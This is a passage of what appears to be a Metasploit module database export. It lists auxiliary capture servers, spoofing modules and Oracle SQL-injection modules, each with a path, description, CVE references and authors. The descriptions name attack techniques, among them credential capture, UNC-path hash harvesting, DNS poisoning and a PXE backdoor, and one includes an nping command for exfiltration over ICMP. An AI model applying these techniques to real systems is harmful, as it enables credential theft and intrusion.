Carey , hdm " 1754,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/http_ntlm.rb","auxiliary","server/capture/http_ntlm","auxiliary/server/capture/http_ntlm","HTTP Client MS Credential Catcher",300,"This module attempts to quietly catch NTLM/LM Challenge hashes.","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Ryan Linn " 1755,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/imap.rb","auxiliary","server/capture/imap","auxiliary/server/capture/imap","Authentication Capture: IMAP",300,"This module provides a fake IMAP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1756,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/mssql.rb","auxiliary","server/capture/mssql","auxiliary/server/capture/mssql","Authentication Capture: MSSQL",300,"This module provides a fake MSSQL service that is designed to capture authentication credentials. The modules supports both the weak encoded database logins as well as Windows logins (NTLM).","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1757,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/mysql.rb","auxiliary","server/capture/mysql","auxiliary/server/capture/mysql","Authentication Capture: MySQL",300,"This module provides a fake MySQL service that is designed to capture authentication credentials. 
It captures challenge and response pairs that can be supplied to Cain or JtR for cracking.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1758,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/pop3.rb","auxiliary","server/capture/pop3","auxiliary/server/capture/pop3","Authentication Capture: POP3",300,"This module provides a fake POP3 service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1759,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/postgresql.rb","auxiliary","server/capture/postgresql","auxiliary/server/capture/postgresql","Authentication Capture: PostgreSQL",300,"This module provides a fake PostgreSQL service that is designed to capture clear-text authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Dhiru Kholia " 1760,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/printjob_capture.rb","auxiliary","server/capture/printjob_capture","auxiliary/server/capture/printjob_capture","Printjob Capture Service",300,"This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The captured printjob can then be forwarded on to another printer (required for LPR printjobs). Resulting PCL/PS files can be read with GhostScript/GhostPCL. 
Note, this module does not yet support IPP connections.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t","URL-http://blog.c22.cc/toolsscripts/prn-2-me/, URL-http://www.ghostscript.com","Chris John Riley, todb " 1761,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/sip.rb","auxiliary","server/capture/sip","auxiliary/server/capture/sip","Authentication Capture: SIP",300,"This module provides a fake SIP service that is designed to capture authentication credentials. It captures challenge and response pairs that can be supplied to Cain or JtR for cracking.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1762,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/smb.rb","auxiliary","server/capture/smb","auxiliary/server/capture/smb","Authentication Capture: SMB",300,"This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. 
When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.","Metasploit Framework License (BSD)","f",,,"Sniffer","passive","t",,"hdm " 1763,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/smtp.rb","auxiliary","server/capture/smtp","auxiliary/server/capture/smtp","Authentication Capture: SMTP",300,"This module provides a fake SMTP service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"ddz , hdm " 1764,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/telnet.rb","auxiliary","server/capture/telnet","auxiliary/server/capture/telnet","Authentication Capture: Telnet",300,"This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs and WONTs are sent to the client for all option negotiations, except for ECHO at the time of the password prompt since the server controls that for a bit more realism.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"kris katterjohn " 1765,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/capture/vnc.rb","auxiliary","server/capture/vnc","auxiliary/server/capture/vnc","Authentication Capture: VNC",300,"This module provides a fake VNC service that is designed to capture authentication credentials.","Metasploit Framework License (BSD)","f",,,"Capture","passive","t",,"Patrik Karlsson " 1766,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/dhcp.rb","auxiliary","server/dhcp","auxiliary/server/dhcp","DHCP Server",300,"This module provides a DHCP service","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"apconole , scriptjunkie" 1767,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/dns/spoofhelper.rb","auxiliary","server/dns/spoofhelper","auxiliary/server/dns/spoofhelper","DNS Spoofing Helper Service",300,"This module provides a DNS service that returns TXT records indicating information about the querying service. Based on Dino Dai Zovi DNS code from Karma.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"ddz , hdm " 1768,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/fakedns.rb","auxiliary","server/fakedns","auxiliary/server/fakedns","Fake DNS Service",300,"This module provides a DNS service that redirects all queries to a particular address.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"ddz , hdm " 1769,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/ftp.rb","auxiliary","server/ftp","auxiliary/server/ftp","FTP File Server",300,"This module provides a FTP service","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"hdm " 1770,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/http_ntlmrelay.rb","auxiliary","server/http_ntlmrelay","auxiliary/server/http_ntlmrelay","HTTP Client MS Credential Relayer",300,"This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. Complicated custom attacks requiring multiple requests that depend on each other can be written using the SYNC* options. 
For example, a CSRF-style attack might first set an HTTP_GET request with a unique SYNCID and set an HTTP_POST request with a SYNCFILE, which contains logic to look through the database and parse out important values, such as the CSRF token or authentication cookies, setting these as configuration options, and finally create a web page with iframe elements pointing at the HTTP_GET and HTTP_POSTs.","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Rich Lundeen " 1771,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/icmp_exfil.rb","auxiliary","server/icmp_exfil","auxiliary/server/icmp_exfil","ICMP Exfiltration Service",300,"This module is designed to provide a server-side component to receive and store files exfiltrated over ICMP echo request packets. To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF'); this can be followed by the filename being sent (or a random filename can be assigned). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (defaults to '^EOL') is received. Suggested Client: Data can be sent from the client using a variety of tools. One such example is nping (included with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string ""BOFtest.txt"" -c1","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/, URL-http://nmap.org/book/nping-man.html, URL-https://github.com/todb/packetfu","Chris John Riley" 1772,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/pxexploit.rb","auxiliary","server/pxexploit","auxiliary/server/pxexploit","PXE Boot Exploit Server",300,"This module provides a PXE server, running a DHCP and TFTP server. 
The default configuration loads a Linux kernel and initrd into memory that read the hard drive, placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and adding a uid 0 user with username and password metasploit to any Linux partition seen. The Windows user will have the password p@SSw0rd!123456 (in case of complexity requirements) and will be added to the administrators group. Note: the displayed IP address of a target is the address this DHCP server handed out, not the ""normal"" IP address the host uses.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"scriptjunkie" 1773,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/socks4a.rb","auxiliary","server/socks4a","auxiliary/server/socks4a","Socks4a Proxy Server",300,"This module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections.","Metasploit Framework License (BSD)","f",,,"Proxy","passive","t",,"sf " 1774,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/socks_unc.rb","auxiliary","server/socks_unc","auxiliary/server/socks_unc","SOCKS Proxy UNC Path Redirection",300,"This module provides a Socks proxy service that redirects all HTTP requests to a web page that loads a UNC path.","Metasploit Framework License (BSD)","f",,,"Proxy","passive","t",,"hdm " 1775,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/tftp.rb","auxiliary","server/tftp","auxiliary/server/tftp","TFTP File Server",300,"This module provides a TFTP service.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"jduck " 1776,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/webkit_xslt_dropper.rb","auxiliary","server/webkit_xslt_dropper","auxiliary/server/webkit_xslt_dropper","Cross Platform Webkit File Dropper",300,"This module exploits an XSLT vulnerability in Webkit to drop ASCII or UTF-8 files to 
the target file-system. By default, the file will be dropped in C:\Program Files\","Metasploit Framework License (BSD)","f",,,"WebServer","passive","t",,"Nicolas Gregoire" 1777,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/server/wpad.rb","auxiliary","server/wpad","auxiliary/server/wpad","WPAD.dat File Server",300,"This module generates a valid wpad.dat file for WPAD MITM attacks. Usually this module is used in combination with DNS attacks or the 'NetBIOS Name Service Spoofer' module. Please remember that, as the server will be running by default on TCP port 80, you will need the required privileges to open that port.","Metasploit Framework License (BSD)","f",,,,"passive","t",,"et " 1778,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sniffer/psnuffle.rb","auxiliary","sniffer/psnuffle","auxiliary/sniffer/psnuffle","pSnuffle Packet Sniffer",300,"This module sniffs passwords like dsniff did in the past.","Metasploit Framework License (BSD)","f",,,"Sniffer","passive","t",,"Max Moser " 1779,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/arp/arp_poisoning.rb","auxiliary","spoof/arp/arp_poisoning","auxiliary/spoof/arp/arp_poisoning","ARP Spoof",300,"Spoof ARP replies and poison remote ARP caches to conduct IP address spoofing or a denial of service.","Metasploit Framework License (BSD)","f","1999-12-22 00:00:00",,,"aggressive","t","CVE-1999-0667, OSVDB-11169, URL-http://en.wikipedia.org/wiki/ARP_spoofing","amaloteaux " 1780,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/cisco/dtp.rb","auxiliary","spoof/cisco/dtp","auxiliary/spoof/cisco/dtp","Forge Cisco DTP Packets",300,"This module forges DTP packets to initialize a trunk port.","Metasploit Framework License (BSD)","f",,,"Service","passive","t",,"Spencer McIntyre" 1781,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/dns/bailiwicked_domain.rb","auxiliary","spoof/dns/bailiwicked_domain","auxiliary/spoof/dns/bailiwicked_domain","DNS BailiWicked Domain Attack",300,"This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domain's nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server specified in the NEWDNS option of this exploit.","Metasploit Framework License (BSD)","f","2008-07-21 00:00:00",,,"aggressive","t","CVE-2008-1447, OSVDB-46776, URL-http://www.caughq.org/exploits/CAU-EX-2008-0003.txt, US-CERT-VU-800113","Cedric Blancher , I)ruid , hdm " 1782,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/dns/bailiwicked_host.rb","auxiliary","spoof/dns/bailiwicked_host","auxiliary/spoof/dns/bailiwicked_host","DNS BailiWicked Host Attack",300,"This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. 
Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.","Metasploit Framework License (BSD)","f","2008-07-21 00:00:00",,,"aggressive","t","CVE-2008-1447, OSVDB-46776, URL-http://www.caughq.org/exploits/CAU-EX-2008-0002.txt, US-CERT-VU-800113","I)ruid , hdm " 1783,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/dns/compare_results.rb","auxiliary","spoof/dns/compare_results","auxiliary/spoof/dns/compare_results","DNS Lookup Result Comparison",300,"This module can be used to determine differences in the cache entries between two DNS servers. This is primarily useful for detecting cache poisoning attacks, but can also be used to detect geo-location loadbalancing.","Metasploit Framework License (BSD)","f","2008-07-21 00:00:00",,,"aggressive","t",,"hdm " 1784,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/llmnr/llmnr_response.rb","auxiliary","spoof/llmnr/llmnr_response","auxiliary/spoof/llmnr/llmnr_response","LLMNR Spoofer",300,"LLMNR (Link-local Multicast Name Resolution) is the successor of NetBIOS (Windows Vista and up) and is used to resolve the names of neighboring computers. This module forges LLMNR responses by listening for LLMNR requests sent to the LLMNR multicast address (224.0.0.252) and responding with a user-defined spoofed IP address.","Metasploit Framework License (BSD)","f",,,"Service","passive","t","URL-http://www.ietf.org/rfc/rfc4795.txt","Robin Francois " 1785,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/nbns/nbns_response.rb","auxiliary","spoof/nbns/nbns_response","auxiliary/spoof/nbns/nbns_response","NetBIOS Name Service Spoofer",300,"This module forges NetBIOS Name Service (NBNS) responses. 
It will listen for NBNS requests sent to the local subnet's broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to tcp/137 on all interfaces.","Metasploit Framework License (BSD)","f",,,"Service","passive","t","URL-http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html","Tim Medin " 1786,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/replay/pcap_replay.rb","auxiliary","spoof/replay/pcap_replay","auxiliary/spoof/replay/pcap_replay","Pcap Replay Utility",300,"Replay a pcap capture file","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"amaloteaux " 1787,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/wifi/airpwn.rb","auxiliary","spoof/wifi/airpwn","auxiliary/spoof/wifi/airpwn","Airpwn TCP Hijack",300,"TCP streams are 'protected' only in so much as the sequence number is not guessable. Wifi is shared media. Got your nose. Responses which do not begin with Header: Value assumed to be HTML only and will have Header:Value data prepended. 
Responses which do not include a Content-Length header will have one generated.","Metasploit Framework License (BSD)","f",,,"Airpwn","aggressive","t",,"ddz , dragorn, hdm , toast" 1788,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/spoof/wifi/dnspwn.rb","auxiliary","spoof/wifi/dnspwn","auxiliary/spoof/wifi/dnspwn","DNSpwn DNS Hijack",300,"Race DNS responses and replace DNS queries","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"dragorn" 1789,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb","auxiliary","sqli/oracle/dbms_cdc_ipublish","auxiliary/sqli/oracle/dbms_cdc_ipublish","Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE",300,"The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",,,"aggressive","t","CVE-2008-3996, OSVDB-49321, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml","MC " 1790,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb","auxiliary","sqli/oracle/dbms_cdc_publish","auxiliary/sqli/oracle/dbms_cdc_publish","Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE",300,"The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. 
Fixed with October 2008 CPU.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",,,"aggressive","t","CVE-2008-3995, OSVDB-49320, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml","MC " 1791,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb","auxiliary","sqli/oracle/dbms_cdc_publish2","auxiliary/sqli/oracle/dbms_cdc_publish2","Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE",300,"The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.","Metasploit Framework License (BSD)","f","2010-04-26 00:00:00",,,"aggressive","t","CVE-2010-0870, OSVDB-63772, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html","MC " 1792,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb","auxiliary","sqli/oracle/dbms_cdc_publish3","auxiliary/sqli/oracle/dbms_cdc_publish3","Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET",300,"The module exploits an sql injection flaw in the CREATE_CHANGE_SET procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. 
By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.","Metasploit Framework License (BSD)","f","2010-10-13 00:00:00",,,"aggressive","t","CVE-2010-2415, OSVDB-70078, URL-http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html","MC " 1793,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb","auxiliary","sqli/oracle/dbms_cdc_subscribe_activate_subscription","auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription","Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION",300,"This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. This vulnerability affects Oracle Database Server 9i up to 9.2.0.5 and 10g up to 10.1.0.4.","Metasploit Framework License (BSD)","f","2005-04-18 00:00:00",,,"aggressive","t","BID-13236, CVE-2005-4832, OSVDB-15553, URL-http://www.appsecinc.com/resources/alerts/oracle/2005-02.html, URL-http://www.argeniss.com/research/OraDBMS_CDC_SUBSCRIBEExploit.txt","Esteban Martinez Fayo, juan vazquez " 1794,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_export_extension.rb","auxiliary","sqli/oracle/dbms_export_extension","auxiliary/sqli/oracle/dbms_export_extension","Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION",300,"This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. 
Note: This module has been tested against 9i, 10gR1 and 10gR2.","Metasploit Framework License (BSD)","f","2006-04-26 00:00:00",,,"aggressive","t","BID-17699, CVE-2006-2081, OSVDB-25002, URL-http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html","MC " 1795,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb","auxiliary","sqli/oracle/dbms_metadata_get_granted_xml","auxiliary/sqli/oracle/dbms_metadata_get_granted_xml","Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML",300,"This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.","Metasploit Framework License (BSD)","f","2008-01-05 00:00:00",,,"aggressive","t","URL-http://www.metasploit.com","MC " 1796,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb","auxiliary","sqli/oracle/dbms_metadata_get_xml","auxiliary/sqli/oracle/dbms_metadata_get_xml","Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML",300,"This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_METADATA.GET_XML package/function.","Metasploit Framework License (BSD)","f","2008-01-05 00:00:00",,,"aggressive","t","URL-http://www.metasploit.com","MC " 1797,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb","auxiliary","sqli/oracle/dbms_metadata_open","auxiliary/sqli/oracle/dbms_metadata_open","Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN",300,"This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_METADATA.OPEN package/function.","Metasploit Framework License (BSD)","f","2008-01-05 00:00:00",,,"aggressive","t","URL-http://www.metasploit.com","MC " 1798,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/droptable_trigger.rb","auxiliary","sqli/oracle/droptable_trigger","auxiliary/sqli/oracle/droptable_trigger","Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger",300,"This module will escalate an Oracle DB user to MDSYS by exploiting an SQL injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that, the exploit escalates the user to DBA using the ""CREATE ANY TRIGGER"" privilege given to the MDSYS user, by creating an evil trigger in the SYSTEM schema (2-stage attack).","Metasploit Framework License (BSD)","f","2009-01-13 00:00:00",,,"aggressive","t","CVE-2008-3979, OSVDB-51354, URL-http://www.ngssoftware.com/, URL-http://www.securityfocus.com/archive/1/500061","Sh2kerr " 1799,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb","auxiliary","sqli/oracle/jvm_os_code_10g","auxiliary/sqli/oracle/jvm_os_code_10g","Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution",300,"This module exploits a flaw (0 day) in the DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only).","Metasploit Framework License (BSD)","f","2010-02-01 00:00:00",,,"aggressive","t","CVE-2010-0866, OSVDB-62184, URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield, URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/","sid " 1800,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb","auxiliary","sqli/oracle/jvm_os_code_11g","auxiliary/sqli/oracle/jvm_os_code_11g","Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution",300,"This module exploits a flaw (0 day) in the DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. 
Works on 11g R1 and R2 (Windows only).","Metasploit Framework License (BSD)","f","2010-02-01 00:00:00",,,"aggressive","t","CVE-2010-0866, OSVDB-62184, URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield, URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/","sid " 1801,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb","auxiliary","sqli/oracle/lt_compressworkspace","auxiliary/sqli/oracle/lt_compressworkspace","Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE",300,"This module exploits an SQL injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2008-10-13 00:00:00",,,"aggressive","t","CVE-2008-3982, OSVDB-49324, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html","CG " 1802,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb","auxiliary","sqli/oracle/lt_findricset_cursor","auxiliary/sqli/oracle/lt_findricset_cursor","Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method",300,"This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.LT.FINDRICSET package via the Evil Cursor technique. Tested on Oracle 10.1.0.3.0; should work through 10.1.0.5.0 and supposedly on 11g. 
Fixed with Oracle Critical Patch update October 2007.","Metasploit Framework License (BSD)","f","2007-10-17 00:00:00",,,"aggressive","t","BID-26098, CVE-2007-5511, OSVDB-40079, URL-http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html","CG " 1803,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb","auxiliary","sqli/oracle/lt_mergeworkspace","auxiliary/sqli/oracle/lt_mergeworkspace","Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE",300,"This module exploits an sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",,,"aggressive","t","CVE-2008-3983, OSVDB-49325, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml, URL-http://www.dsecrg.com/pages/expl/show.php?id=23, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html","CG " 1804,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb","auxiliary","sqli/oracle/lt_removeworkspace","auxiliary/sqli/oracle/lt_removeworkspace","Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE",300,"This module exploits an sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. 
Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2008-10-13 00:00:00",,,"aggressive","t","CVE-2008-3984, OSVDB-49326, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml","Sh2kerr " 1805,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb","auxiliary","sqli/oracle/lt_rollbackworkspace","auxiliary/sqli/oracle/lt_rollbackworkspace","Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE",300,"This module exploits an SQL injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2009-05-04 00:00:00",,,"aggressive","t","CVE-2009-0978, OSVDB-53734, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html","MC " 1806,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/voip/asterisk_login.rb","auxiliary","voip/asterisk_login","auxiliary/voip/asterisk_login","Asterisk Manager Login Utility",300,"This module attempts to authenticate to an Asterisk Manager service. Please note that by default, Asterisk Call Management (port 5038) only listens locally, but this can be manually configured in the file /etc/asterisk/manager.conf by the admin on the victim machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.asterisk.org/astdocs/node201.html","Alligator Security Team " 1807,"2013-05-07 